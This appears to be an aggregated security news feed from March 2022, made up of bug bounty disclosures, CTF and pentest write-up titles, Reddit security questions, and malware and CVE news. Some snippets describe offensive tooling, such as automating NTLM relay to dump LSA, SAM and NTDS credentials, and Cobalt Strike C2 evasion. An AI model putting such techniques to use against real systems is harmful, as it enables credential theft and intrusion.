    Introduction: Indirect Command Execution is a defense evasion technique often used by Red Teams, in which an adversary tries to bypass certain defenses… (Hacking Articles)

    IDOR at https://demo.sftool.gov/TwsHome/ScorecardManage/ via scorecard name
    U.S. General Services Administration disclosed a bug submitted by hollaatm3: https://hackerone.com/reports/1472721
    Use of uninitialized value of in req_parsebody method of lua_request.c
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1514863 - Bounty: $2400
    Theft of protected files on Android
    ownCloud disclosed a bug submitted by n00b-cyborg: https://hackerone.com/reports/1454002 - Bounty: $50
    Instance Page DOS within Organization on TikTok Ads
    TikTok disclosed a bug submitted by arsene_lupin: https://hackerone.com/reports/1478930 - Bounty: $200
  • Open

    How I was able to find 50+ Cross-site scripting (XSS) Security Vulnerabilities on Bugcrowd Public…
    No content preview
    How contact forms can be exploited to conduct large-scale phishing activity?
    No content preview
    Securing your Linux Servers Part 3
    No content preview
    Synkcon CTF 2021 not-hot-dog Writeup
    No content preview
    Simple Recon Methodology
    No content preview
    TryHackMe: Basic Pentesting
    No content preview
    TryHackMe: RootMe
    No content preview
    TryHackMe: Blue
    No content preview
    TryHackMe: RES
    No content preview
  • Open

    SecWiki News 2022-03-17 Review
    A comprehensive study of stateless scanning in the wild by Avenger. For more of the latest articles, visit SecWiki
  • Open

    Unable to run Plaso Autopsy ingest module on Windows 10. Anyone know a workaround?
    I’m running Autopsy 4.19.3 on Windows 10 and I’m unable to run the plaso module against any data source. The logs show this error: SEVERE: Plaso experienced an error during analysis (data source = Y247388.E01, objId = 1, pipeline id = 3, ingest job id = 2) java.nio.file.InvalidPathException: Illegal char at index 92: C:\Users\forensics\Documents\Cases\Y247388-New\ModuleOutput\plaso\2022-03-16 15-15-11 GMT-07:00 It looks like the plaso module is trying to create a file or folder with a colon in it from the timezone information. Is there any way to get around this? submitted by /u/thenebular [link] [comments]
    An employee downloaded a virus to a computer.
    What are the chances it was able to access entire server? Have a team working on it but waiting and wondering. submitted by /u/Otherwise-Special-95 [link] [comments]
  • Open

    Bypassing Stack Canaries and NX/DEP (Ret2Lib-C) - Bird - [Intigriti 1337UP LIVE CTF 2022]
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    American NGO affected by your recklessness (node-ipc vulnerability)
    Article URL: https://github.com/RIAEvangelist/node-ipc/issues/308 Comments URL: https://news.ycombinator.com/item?id=30711545 Points: 25 # Comments: 13
  • Open

    X is a New Horror Cult Classic
    BOOGIE NIGHTS meets THE TEXAS CHAINSAW MASSACRE in Ti West’s latest Continue reading on Cinapse »
  • Open

    Parameter Pollution - Zero Day
    Summary : Continue reading on Medium »
    Cansina — Open Source Hidden Content Discovery Tool on Linux
    Reconnaissance is one of the first steps to conduct within a pen test engagement. During this stage, information is gathered using… Continue reading on Medium »
    My First Blind SQL Injection
    Hello Hackers and security community.. Continue reading on Medium »
    Sensitive Information disclosure through unrestricted Directories
    Hello Hackers and Security community.. Continue reading on Medium »
    Google Dorks and a SQL Dump
    An odd Google Dorking method I used to successfully find a SQL dump. Continue reading on Medium »
    The 13 Best Vulnerable Web Applications & Vulnerable Websites for Testing
    This list contains a variety of vulnerable websites, vulnerable web apps, battlegrounds and wargames communities. Continue reading on Medium »
  • Open

    FreeBuf Morning Report | China's cybersecurity market to exceed US$21.4 billion by 2025; Ukrainian security agency arrests hacker supporting Russian forces
    The Security Service of Ukraine (SSU) says it has detained a hacker who provided technical support to Russian forces.
    Unpatched RCE vulnerability in dompdf affects the HTML-to-PDF converter
    Researchers found an unpatched security vulnerability in "dompdf" which, if successfully exploited, could lead to remote code execution in certain configurations.
    Hundreds of GoDaddy-hosted websites backdoored in a short span of time
    A number of WordPress sites hosted on GoDaddy's managed servers had a large number of backdoors deployed on them.
    New "B1txor20" Linux botnet spreading via the Log4J vulnerability
    The new B1txor20 malware can enlist target devices into a botnet and serve as a channel for downloading and installing rootkits.
    Facebook removes fake video of Ukrainian President Zelensky
    Facebook recently removed a fake video circulating on the social network in which Ukrainian President Zelensky asks Ukrainian troops to lay down their arms and surrender.
  • Open

    Diagrams and instructions for toilets.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Learning V8 Exploitation from Scratch: CVE-2021-21220 (Part 8)
    Author: Hcamael@Knownsec 404 Team. Date: 21 February 2022. The sixth vulnerability studied is CVE-2021-21220, whose Chrome bug number is 1196683. Its related information is easy to find: highest affected Chrome version: 89.0.4389.114; highest affected V8 version: 8.9.255.24; an exploit is attached as well. Setting up the environment: build the relevant environment with one command: $ ./build.sh 8.9.255.24...
  • Open

    TOOL: ntlmrelayx2proxychains combining/automating ntlmrelayx, crackmapexec, and proxychains!
    submitted by /u/BugbearB [link] [comments]
    NPM supply chain attack: node-ipc and peacenotwar sabotaged as an act of protest by the maintainer
    submitted by /u/tubularobot [link] [comments]
    Cool Open Source Security Tools & Programs list
    submitted by /u/Khaotic_Kernel [link] [comments]
    Git honours embedded bare repos - justinsteven
    submitted by /u/Gallus [link] [comments]
    Call for participants in Rizin/Cutter's Google Summer of Code 2022
    submitted by /u/XVilka [link] [comments]
    Arya - new tool to generate pseudo malware samples based on YARA rules
    submitted by /u/n0llbyte [link] [comments]
    cr8escape: New Vulnerability in CRI-O allows for container breakout
    submitted by /u/raesene2 [link] [comments]
    Top 10 CI/CD Security Risks
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    HermeticWiper Technical Analysis Report
    submitted by /u/mstfknn [link] [comments]
    ThreatMapper 1.3.0 update - +runtime SBOM, +secret scanning, +attack path
    submitted by /u/foobarbazwibble [link] [comments]
    From XSS to RCE (dompdf 0day)
    submitted by /u/mckirk_ [link] [comments]
    Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582) - Whilst analysing the patch for CVE-2021-30833, an additional vulnerability was identified which could allow for arbitrary file-write when unpacking a malicious XAR archive using the xar utility.
    submitted by /u/digicat [link] [comments]
    7 RCE and DoS vulnerabilities Found in ClickHouse DBMS
    submitted by /u/SRMish3 [link] [comments]
    CVE-2022-25636 : New Linux Bug in Netfilter Firewall Module Lets Attackers Gain Root Access
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    TOOL: ntlmrelayx2proxychains
    ntlmrelayx2proxychains aims to connect the tool of the SecureAuthCorps' impacket suite, ntlmrelayx.py (hereafter referred to as "ntlmrelayx"), along with @byt3bl33d3r's tool, CrackMapExec (hereafter referred to as "CME"), over proxychains, developed by haad. Currently, when having active relays via ntlmrelayx.py, you need to manually provide user, domain, and IP address in CME over proxychains. The idea behind this tool is to automate this process. So have you ever felt too lazy to explore all shares, logged-in users, sessions, disks, and/or password policy manually after using ntlmrelayx, or felt too lazy to dump the LSA, SAM, and/or NTDS on all systems where you found a local administrator? If so, you'll for sure enjoy ntlmrelayx2proxychains! :) Link: https://github.com/He-No/ntlmrelayx2proxychains submitted by /u/BugbearB [link] [comments]
    Have Your Cake and Eat it Too? An Overview of UNC2891
    submitted by /u/dmchell [link] [comments]
  • Open

    Can you be Hacked by Visiting a Website?
    Visiting websites throughout the decades has always had its risks. With the creation of Flash Player and JavaScript, site visitors could potentially be impacted by malicious viruses, like the notorious YouAreAnIdiot[.]org pop-ups that caused computers to be overrun by a massive amount of pop-ups until the computer rebooted. Unfortunately, infections can, and likely always will, exist when accessing infected sites. In this article, we'll discuss the kinds of hacked sites that are still out there and how to avoid them. Continue reading Can you be Hacked by Visiting a Website? at Sucuri Blog.
  • Open

    Basic Pentesting — Process Report
    Step 1: We begin Enumeration. Continue reading on Medium »
  • Open

    X-XSS-Protection headers. Protection or vulnerability?
    What is it? Continue reading on Medium »
    Nmap Cheat Sheet
    Full nmap cheat sheet with example. Continue reading on Medium »
    The 7 Penetration Testing Steps & Phases: a Checklist
    7 Steps and Phases of Penetration Testing Continue reading on Medium »
    Optimism Infinite Money Duplication Bugfix Review
    Summary Continue reading on Immunefi »
    Hats Finance Opens New Bug Bounty Program with Fuji DAO
    About Fuji DAO Continue reading on Medium »
    How I was able to find 50+ Cross site scripting(XSS) Security Vulnerabilities on Bugcrowd Public…
    Hello everyone, I hope by the grace of God everyone who is reading this blog post is doing well and their families during this pandemic… Continue reading on Medium »
    AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 1
    Hello Members, I hope that you liked the previous article that is File-Inclusion. Therefore, I worked hard to complete Penetration-list… Continue reading on Medium »
    How I “HACKED” my college site
    Hello readers, I am Aditya, a second year student at Madhav Institute of Technology and Science, Gwalior. This is a story of how I… Continue reading on Medium »
    KitHack — Hacking tools pack in Kali Linux
    KitHack Framework is a free and open-source tool available on GitHub. It is designed to automate the process of downloading and installing… Continue reading on Medium »
  • Open

    Cobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect
    The Malleable C2 profile helps make Cobalt Strike an effective emulator for which it is difficult to design traditional firewall defenses. The post Cobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect appeared first on Unit42.
  • Open

    Just wondering
    Can a phone be hacked? To where you can see my phone calls, text messages, browser history, and location. If so how can I protect my info? submitted by /u/Valuable-Green-8890 [link] [comments]
    What's the correct term for a SaaS provider who uses another Cloud service for their underlying platform?
    I've been wrestling with finding the correct term for a breed of SaaS provider, and I'm hoping that such a thing exists. I'm talking about the SaaS products that use Azure, AWS or Google on the backend for the platform, but construct their own applications for resale. I want to call them middleware, but I know that is not correct. The reason I'm asking is I get A LOT of proposers who make no comments about their own cybersecurity posture, and keep deferring to whatever security is provided by the underlying platform. Thoughts? submitted by /u/paulexander [link] [comments]
    Safe to explore evtx / hives from a compromised machine?
    Hi, one of my friends has been hit by some ransomware, and he just asked me for some help to reinstall the OS (Win10). I'm wondering whether this could be a nice chance to investigate (for fun) the Windows logs and/or system registry with some tools like Registry Explorer. Can I do this on my day-to-day machine? Is there any risk of getting infected? Sorry for my probably silly question. submitted by /u/g-simon [link] [comments]
    Any good communities or forums for learning assembly language or reverse engineering at all?
    Looking for some communities and forums which can help me to learn more about assembly language and reverse engineering. Anyone have any suggestions or resources? submitted by /u/SufficientDistrict10 [link] [comments]
    functional vs non-functional security requirements
    I have been asked to create functional and non-functional requirements for the products we will acquire from various different vendors. I work in the security architecture department. The non-functional ones are going to be pretty much generic and I see significant resources on the internet, but can someone provide some pointers which will help me make a functional requirements document for security architecture? submitted by /u/anjan42 [link] [comments]
    Pentest Burnout - Looking for advice on next steps
    Bit of a different post here than usual. I've been a pentester for 3 years now with the same company. Management is poor and there are many hours spent off the clock being used to catch up on writing reports that couldn't be done in time due to overlapping client work. We are busy (which is "a good thing" as they say), but our team has been grinding pretty much non-stop for 2 years. High utilization rates (usually pushing 100%) keep us all booked with little to no wiggle room to pursue career development related items like new certs/training unless it's done on what's left of our free time. I likely should've left earlier, but I needed the job for stability. I feel more stable financially but not mentally, so I think it may be time to move on. It's hard to decide if I'm just burned out from pentesting as a whole or if I would thrive in a better managed environment. Either way, I'm leaning towards internal blue team related jobs as it seems to be the best way to transition my skills. My biggest struggle is dealing with too many clients in a short timespan, and having work follow me after hours. I don't know what job in this line of work can eliminate those two things, but I am on the hunt and would love suggestions! TLDR: What are jobs that pentesters can transition into after getting burnt out? I am thinking about internal blue team related positions, but open to any other suggestions. Please feel free to share any similar experiences as well. submitted by /u/UniversitySquirrel [link] [comments]
    Approach to selecting a new pen test vendor. What should I look for/ask?
    Hi all, I work for a financial company that has about 400 employees. I am not an expert on net sec but know some basics. I have been with the company for about two years and am somewhat familiar with our environment. My boss asked me to look into a new pen test vendor and since I have no experience with this sort of thing I was wondering how I should be approaching this. Seems like the last guy who did this is no longer around for guidance. Any help is appreciated. Thank you submitted by /u/Throwawayboi91 [link] [comments]
    web hacking automation
    I have a dev background and I'm quite familiar with web hacking. Seeing these top hackers automating a ton, one question arises in my mind: "What bugs are practically automatable?" Everyone is automating subdomain takeovers, which are easy to automate, but what about XSS or SQLi? Are they automating those by only checking URL parameters? submitted by /u/crusader2409 [link] [comments]
    How safe is js source obfuscation?
    I don't have much background in security. I am planning to make a small game for an event. Imagine something like Flappy Bird, except that you will get a real prize in the form of a gift card after finishing the game. To prevent players from cheating, I will obfuscate the JS source, but how safe is this approach? Is it easy to bypass? And how much will JS obfuscation impact performance? submitted by /u/Chillseashells [link] [comments]
    Active Directory protocols
    Hi! I am reading on AD network security. Currently, I find only network-related security issues regarding NTLM and Kerberos. Are there not other protocols and correlating attacks that are out there? I would love references to papers or blogs. submitted by /u/DiiBBz [link] [comments]
    Internal Websites / Web GUIs Best Practices
    I have taken over a 15 segment switch network that has been neglected in the use of best practices for many years. I have migrated from telnet to SSH, local logins to RADIUS, SNMPv3 and so on. The issue I am having is that my coworkers and I are having a difference of opinion on certain things. The last issue I had was the best practices in regards to SNMPv3. https://www.reddit.com/r/AskNetsec/comments/taa6ny/snmpv3_password_best_practice/?utm_source=share&utm_medium=web2x&context=3 The advice I got here was helpful for us to come to an understanding on the proper course of action. I would like to ask for more help. We have several internal websites / web GUIs: Cisco Firepower, Cisco Prime, SolarWinds, Cisco Wireless controllers, etc. These sites are all internal with no public-facing addresses, just private addressing 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16. I say that we should have a URL and install a web certificate in order to have HTTPS so the traffic is encrypted. I am getting pushback from my coworkers that this is overkill since we don't allow access to these systems. I am thinking that this could be an attack vector, since malicious software could be installed on our network collecting such information, and when they have enough it's game over for us. Could anyone direct me to some good information on this topic or take a moment of their time to explain it here? Thank you in advance. submitted by /u/NetworkRex [link] [comments]
    Question about HaveIBeenPwned hash lists file size
    Hello, On the website I see two options to download, one of them is ordered by prevalence and one is ordered by hash. Any idea why the ordered by prevalence is much much larger? 17.2 GB vs 11.1 GB https://haveibeenpwned.com/Passwords submitted by /u/itismo [link] [comments]
    Port forwarding VPN server dangerous?
    I want to host my own VPN server. The server in question is pretty discardable, a.k.a. if it breaks, I don't really care, so I am planning to port forward it to the internet. The question is: is port forwarding SoftEther VPN safe or not? It certainly depends on the port that is open, but in general, how well do VPN servers like SoftEther hold up against worms and trojans and mass malware? Will it spread to my other devices (which are more valuable than the server)? Is there such a thing as network-level port-forwarding malware? I literally tested port forwarding for a minute on a VM device and I got logs from all over the world with 100s of different IPs. It is a scary place out there and I want to make sure the port of entry is hardened and secure against these "meteors". submitted by /u/bootsareme [link] [comments]
    Question about Sensitive PII and Non-Sensitive PII
    Every day millions of websites capture information like Name, Address, and Email Address for registration on their websites. Is this information considered PII and are they legally obligated to treat it as such? For example, even Facebook captures my name and email address; would this be considered PII? Could someone explain where the line is essentially drawn between what is PII and what is not? Take a CMS like WordPress. WordPress has third-party tools like WooCommerce which capture Name, Physical Address, etc. So, because WooCommerce is capturing this data and it resides on the host installation of WordPress, is this considered PII? Which is the point of my question: would millions of websites be in violation and could they potentially be sued? What would be considered 'reasonable protection'? -FC submitted by /u/FutureCombinations [link] [comments]
  • Open

    Sneaky F*ing Russians: Tracking Sanctioned Super-Yachts
    Last week, Benjamin Strick Tweeted a little piece of satellite imagery from Planet. The imagery was less than a day old, and showed what… Continue reading on Medium »
    Ukraine — Situation update as of 17 March
    The last 24 hours Continue reading on Medium »
    What is Open Source Intelligence (OSINT)?
    Open source intelligence is a term originally coined by intelligence services. OSINT uses freely available, open sources such as print… Continue reading on Medium »
    JupyterLab for Python
    Installation Continue reading on Medium »
  • Open

    windows stuff (+ spongebob favicon)
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Exploit Development: Browser Exploitation on Windows – CVE-2019-0567 (Part 1)
    Article URL: https://connormcgarr.github.io/type-confusion-part-1/ Comments URL: https://news.ycombinator.com/item?id=30702130 Points: 1 # Comments: 1
    Veeam Backup and Replication Distribution Service CVE-2022-26500, CVE-2022-26501
    Article URL: https://www.veeam.com/kb4288 Comments URL: https://news.ycombinator.com/item?id=30696265 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-03-16 Review
    [HTB] TheNotebook Writeup by 0x584a; ICD (Integrated Cyber Defense) concept reference model by ourren; Enterprise security operations in practice: four stages to fast and accurate risk disposition by ourren. For more of the latest articles, visit SecWiki
  • Open

    0-day Cross Origin Request Forgery vulnerability in Grafana 8.x.
    Aiven Ltd disclosed a bug submitted by abrahack: https://hackerone.com/reports/1458236 - Bounty: $1500
    Stored XSS through PDF viewer
    Slack disclosed a bug submitted by hitman_47: https://hackerone.com/reports/881557 - Bounty: $4875
    Open redirect GET-Based on https://www.flickr.com/browser/upgrade/?continue=
    Flickr disclosed a bug submitted by c4rrilat0rr: https://hackerone.com/reports/1217570 - Bounty: $150
  • Open

    [Autopsy] Sample images to learn / practice
    Hi, I am trying to learn Autopsy and I am having a hard time finding any disk images or data sources that I can use to practice and learn certain aspects/features of Autopsy. Can anyone suggest somewhere I can download such samples, with or without instructions? submitted by /u/madladmary [link] [comments]
    Lost Mode iPhone BFU?
    submitted by /u/investigator0101 [link] [comments]
    Exploring Career Transition Options
    I am currently exploring possible career options in the private sector and was hoping to get some input. The career I am interested in would be a remote position and hopefully near the six figure mark. For the past 8 years I have been in law enforcement as a forensic examiner for an ICAC task force. I have a BS in computer information systems and current certifications include A+, CFCE, ICMDE, CCME, and MCFE. I would like to continue doing something I find meaningful and am looking further into Threat Investigator positions for Meta, though I have yet to determine if this is a good fit. Does anyone have advice or opinions on what other positions may exist and what additional steps I may need to take to better prepare for such a future transition? submitted by /u/outdorksman [link] [comments]
  • Open

    HackTheBox — Devzat
    No content preview
    Cisco BroadWorks Vulnerabilities CVE-2021–34785 & CVE-2021–34786
    No content preview
    How to write simple script to automate finding bugs
    No content preview
    OTP Bypass and Account Takeover at Rajagiri Hospital
    No content preview
    SQL Injection at Spotify
    No content preview
  • Open

    FBI warns state-sponsored hackers are exploiting MFA weaknesses for lateral movement
    The US FBI says Russian government-backed hacking groups are actively exploiting misconfigured default multi-factor authentication (MFA) protocols to gain access to the cloud environments of some non-governmental organizations.
    FreeBuf Morning Report | US helps Ukraine strengthen cyber-warfare defenses; Germany advises citizens to uninstall Kaspersky antivirus
    Cybersecurity and digital security are the underlying logic supporting the digital economy and cannot be built on infringing consumers' right to know and right to choose.
    Russia-Ukraine conflict puts critical information infrastructure at risk
    No content preview
    Investigation finds Google Play recently infiltrated by multiple malicious apps
    Security researchers tracking the mobile app ecosystem have noticed a recent surge in trojan infiltration of the Google Play store, with one app downloaded and installed more than 500,000 times.
    Germany's BSI advises replacing Kaspersky antivirus
    The BSI advises users to uninstall Kaspersky antivirus, as it has found the cybersecurity firm may be linked to hacking attacks during Russia's ongoing invasion of Ukraine
    3·15 | Are smart speakers secure? The China Software Testing Center is here to help!
    The China Software Testing Center selected several best-selling smart speakers, with and without screens, and evaluated them from multiple angles including network security, data security and personal information security.
    Russia faces an IT crisis, with only two months of data storage capacity left
    After database giant Oracle, enterprise service provider SAP and other cloud service providers pulled out of Russia, Russia faces a severe IT storage crisis.
    3·15 gala sets up its first security lab to address information security: cybersecurity becomes a "social topic" once again
    At the 2022 3·15 gala, cybersecurity issues were once again a centerpiece; this year's gala set up an information security lab for the first time to demonstrate insecurity first-hand.
  • Open

    GitHub won’t restore HTTPie followers despite vulnerability, no notifications
    Article URL: https://twitter.com/httpie/status/1503862290822664198 Comments URL: https://news.ycombinator.com/item?id=30696255 Points: 7 # Comments: 1
  • Open

    Webinar on cyberattacks in Ukraine -- summary and Q&A
    Translator: Knownsec 404 Team translation group. Original link: https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ About the webinar: On 10 March 2022, Kaspersky's Global Research and Analysis Team (GReAT) shared their insights on current (and past) cyberattacks in Ukraine. In this post, we address the questions we did not have time to answer and provide...
  • Open

    Bye👋🏼 XSS Auditor (X-XSS-Protection)
    This WebKit (Safari 15.4) update includes an important security policy change: the XSS Auditor, well known as X-XSS-Protection, is being removed. The XSS Auditor is a design and security policy intended to mitigate reflected XSS; at the HTML parsing stage it checks how a web request is reflected in the response and blocks it if XSS is possible. Developers have been able to control it through the X-XSS-Protection header in the response. It is reportedly being removed because WebKit's CSP (Content-Security-Policy) support has reached Level 3, so CSP is judged sufficient to handle this. Chrome dropped it in Chrome 78 (around August 2019) and Firefox also discontinued it long ago, so this feature and header are now unsupported in all three major browsers.
    The HAR (HTTP Archive format) format and future development plans
    Today, rather than something technical, I just want to talk about the HAR format, which I have recently become keenly interested in. HAR: HAR (HTTP Archive format) is a JSON-based format created for logging the interaction between a web browser and a website. It was created to export performance measurement information from browsers and web services, and is supported by major tools such as Chrome, Firefox and Postman: Charles Proxy, Fiddler, Firebug, Firefox, Google Chrome, IE, Microsoft Edge, Postman, OWASP ZAP, etc. Why am I interested? HAR has been around for a long time and I already knew of it, having seen it a lot in the browser's developer tools when doing analysis.
  • Open

    how do you train yourself?
    What are you doing about improving yourself/finding an entry-level job in cybersecurity? What is your routine about it? submitted by /u/ogunal00 [link] [comments]
    GDSA or CCNP Security
    Hey guys, so I do GRC for a living. I skipped from helpdesk into GRC consulting, but I'm interested in gaining technical knowledge in cybersecurity so that I could move to a security engineer/security analyst type role in the event I get tired of the work (which I can see happening atm). Something that should also be mentioned is that my job offers flexibility to be put on engagements that fit a topic you're interested in, though I have heard we don't have as many clients asking for help with implementation. I'm an Associate of (ISC)² for the CISSP, have a couple of CompTIA certs, the Azure Administrator, and the CCNA that I grabbed a couple of years ago under the "new" exam structure. My company pays for certs, so price is not really an issue. I am interested in whether the GIAC GDSA or the CCNP Security is a more valuable investment. There's not too much information on the GDSA that I can find, and through my research, I have found people recommending to do the CCNP R&S before going to CCNP Security back when it was under a different format. I'm not interested in getting the CCNP Sec if it requires me to get the CCNP Ent first. I don't really want to be a network engineer nor spend my time learning more advanced networking when I don't see myself using it. The curriculum in the CCNP Sec though seems more up my alley. Another option is to go for my CISM or CISA, but I don't want to focus more on the governance/management side of things when I severely lack practical implementation experience. It is another option on the table though. Thoughts? submitted by /u/DiscombobulatedEar88 [link] [comments]
    Nikto use vulnerabilities found!
    Hey guys, so I had this ASP.NET application I created for testing security (I am completely new to this field). While looking for some tutorials I found this cool tool named Nikto which scans servers for vulnerabilities, and when I was running my ASP.NET app and testing it I got this line in the scan results saying: OSVDB-3092: /web.config: ASP config file is accessible. How can I access the web.config file that Nikto says is accessible? submitted by /u/darkuniv [link] [comments]
    Is there any way to currently circumvent China’s GFW?
    Was reading a couple articles written in last 12 months and I get the sense that most OpenVPN services are detected and blocked, as well as UDP (WireGuard). Is there any alternative that currently works besides direct satellite options? submitted by /u/DryBloomer [link] [comments]
  • Open

    OpenSSL CVE-2022-0778: Infinite loop in BN_mod_sqrt() reachable when parsing certificates
    submitted by /u/yawkat [link] [comments]
    NSA, CISA Release Updated Kubernetes Hardening Guidance
    submitted by /u/sanitybit [link] [comments]
  • Open

    Bounty Hacker Tryhackme
    No content preview
    How I bypassed disable_functions in php to get a remote shell
    No content preview
  • Open

    Coding C2 Bind Shell Channel with C# and Powershell
    https://www.youtube.com/watch?v=9CX7muqkjtQ submitted by /u/luzunov [link] [comments]
    Automating a Red Team Lab: Logging and Monitoring
    submitted by /u/nickonos [link] [comments]
  • Open

    International Women’s Day + Anti-War Protests + Ongoing “Freedom” convoys + More
    On this 4th edition of the discursus Protest Analytics newsletter — March 15, 2022 Continue reading on discursus.io »
    Don’t be a troll
    Around a year ago, I ended up in a Messenger conversation to assist a friend who had started a new business and had the surprise of… Continue reading on Medium »
  • Open

    SecWiki News 2022-03-15 Review
    No news updated today yet~ For more recent articles, visit SecWiki
  • Open

    Node.js security: Parse Server remote code execution vulnerability resolved
    Article URL: https://portswigger.net/daily-swig/node-js-security-parse-server-remote-code-execution-vulnerability-resolved Comments URL: https://news.ycombinator.com/item?id=30686373 Points: 1 # Comments: 0
  • Open

    Cr8escape: Zero-day in CRI-O Container Engine (CVE-2022-0811)
    Article URL: https://www.crowdstrike.com/blog/cr8escape-zero-day-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/ Comments URL: https://news.ycombinator.com/item?id=30686358 Points: 3 # Comments: 0
  • Open

    Mobile malware in Europe has surged 500% since February
    Since February 2022, researchers have observed a 500% increase in the distribution of mobile malware in Europe.
    [Rootkit series research] Highly stealthy, highly persistent threats on the Linux platform
    Judging from the attack history of Western APT groups and the cyber weapons that have already leaked, high stealth and high persistence (Low & Slow) are their key characteristics, and rootkits are one of the important techniques for achieving this.
    Ukraine has used Clearview AI's facial recognition technology in the conflict
    Recently, Ukraine's Ministry of Defense announced that it is deploying the AI facial recognition technology provided by Clearview on the battlefield.
    Hackers breached the German subsidiary of a Russian energy giant and stole 20TB of data
    The hackers said that Russia's invasion of Ukraine was the root cause of the attack.
    Check your phone now: these 14 apps were named by the MIIT
    The MIIT carried out a "look back" campaign on apps that infringe user rights, organizing third-party testing agencies to conduct focused testing of apps, and found problems in 14 apps in total.
    FreeBuf Morning Report | Large-scale DDoS attack hits Israel; auto giant DENSO suffers ransomware attack
    Rumors of a cyberattack on Ubisoft circulated online, and the data extortion group LAPSUS$ indicated that this was no rumor: they had breached Ubisoft.
    A full timeline review of the Russia-Ukraine cyber war and an analysis of its adversarial characteristics
    With the outbreak of full-scale military war between Ukraine and Russia, cyberspace has become a real battlefield.
    Israel hit by large-scale DDoS attack, taking its government websites offline
    According to Israeli media reports, a large-scale DDoS attack forced many Israeli government websites offline.
  • Open

    How Chrome Became Highest Scoring Browser on Speedometer, Ever
    Last week we released a blog post about our improvements in Chrome speed over the past year culminating with the M99 release of Chrome. We wanted to follow up by going in depth on how we achieved this milestone in browser performance. Since the launch of Chrome in 2008, one of our core principles has been to build the fastest browser, whether you're on your phone or laptop. We have never strayed from our performance mission, and are always analyzing and optimizing every part of Chrome. We're proud to announce that Chrome scores over 300 on Apple’s Speedometer 2.0 benchmark suite on the M1 MacBook, the highest score we’ve ever seen. In this The Fast and the Curious post we'll go behind the scenes to share all the work that went into making Chrome blazingly fast. “If you can’t measure it y…
  • Open

    Los 3 Chiflados
    http://37.187.20.239/Los%203%20Chiflados/ submitted by /u/inoculatemedia [link] [comments]
    huge collection of flash games (nsfw) just in case
    submitted by /u/millhouse187 [link] [comments]
  • Open

    The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation
    submitted by /u/AttitudeAdjuster [link] [comments]
  • Open

    Research on exploiting a V8 vulnerability in WeChat for Windows
    Author: lxraa@识链实验室 Preface: because the sandbox could not be bypassed, this vulnerability was dismissed. Some time after Google fixes V8-related vulnerabilities, it publishes the PoC (https://bugs.chromium.org/), and for some vulnerabilities an exploit as well. However, the published exploit usually targets the last vulnerable version; since the data structures of different V8 versions change, the heap layout differs, so published exploits often cannot be used directly outside the lab environment. Taking remote command execution in the latest WeChat as an example, this article walks through the process from the exploit to pra...
    New Russian wiper malware: a deep dive into RURansom malware
    Translator: 知道创宇404实验室 translation team. Original link: https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/ During routine OSINT research, Cyble Research Labs came across a Twitter post by the MalwareHunter team highlighting a ... named RU...
  • Open

    Bug Bounty on Marsbase
    Right after the release of the dOTC of the Marsbase platform, we are launching a Bug Bounty program to find bugs. This program provides… Continue reading on Medium »

  • Open

    Burnout and me
    Please avoid it because it is preventable. Continue reading on Medium »
    Bug Bounty mission on Marsbase dOTC
    In connection with the release of the Marsbase dOTC platform, we are launching a Bug Bounty program to find bugs. This program provides that… Continue reading on Medium »
    Achieving Remote Code Execution via Unrestricted File Upload
    $whoami: Continue reading on Medium »
    SQL Injection at Spotify
    SQL Injection at Spotify. Continue reading on Medium »
    Story about more than 3.5 million PII leakage in Yahoo!!!
    Hello GUYS, Continue reading on Medium »
    How I Made The BBC Hall Of Fame 3 Times
    Happy Monday to anyone reading this write up. Today I am going to describe how I was able to make the BBC Hall Of Fame 3 times. My… Continue reading on Medium »
    My Pentest Log -10- (A Little Tip)
    Greetings to all from Khrysokeras, Continue reading on Medium »
    From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password — “password”
    A simple story when Allah allowed me to get P1 by combining several issues, one of which was related to “weak credentials”. Continue reading on InfoSec Write-ups »
    How I access other domains in infinityfree.net using Directory Traversal
    Hi, it’s me again haha Kurt Russelle Marmol aka xkurtph, Web Developer (noobie) and Security Researcher. Continue reading on Medium »
  • Open

    registering with the same email address multiple times leads to account takeover
    Reddit disclosed a bug submitted by whitehacker18: https://hackerone.com/reports/785833
    User files is disclosed when someone called while the screen is locked
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1338781 - Bounty: $350
    Specially crafted message request crashes the webapp for users who view the message
    Mattermost disclosed a bug submitted by thesecuritydev: https://hackerone.com/reports/1253732 - Bounty: $150
  • Open

    Can an HTTPS Website be Hacked?
    It should be no shock by now that a professional can break through anything. These days, zero-days are a dime a dozen, so it’s important to ensure your site is hardened and protected as much as possible. While an SSL certificate can certainly be an important factor, it’s only one slice of the pie. In this article, we’ll be elaborating on the myths of SSL, the kinds of hacks that still have the potential to occur, and how you can improve an HTTPS site beyond installing an SSL certificate.  Continue reading Can an HTTPS Website be Hacked? at Sucuri Blog.
  • Open

    Wanting to be Pentester
    Just finished high school and am wanting to be a pentester. Got inspired by Mr. Robot, really. Got a little knowledge of Python and C; what are the ways to learn more, and what should I take in college for it? submitted by /u/Small_Run9123 [link] [comments]
    is it too late for me to become a pentester
    Hello. I'm about to graduate college. I have some decent programming experience but no security experience. I can't do the most basic CTFs. If I get OSCP and some other certs will that be enough to do a Jr pentesting job? Will that enable me to do some CTFs? I feel like I should have started when I was like 13. Is it too late for me? submitted by /u/Hellothere6667 [link] [comments]
    General advice needed for dealing with IPS alerts
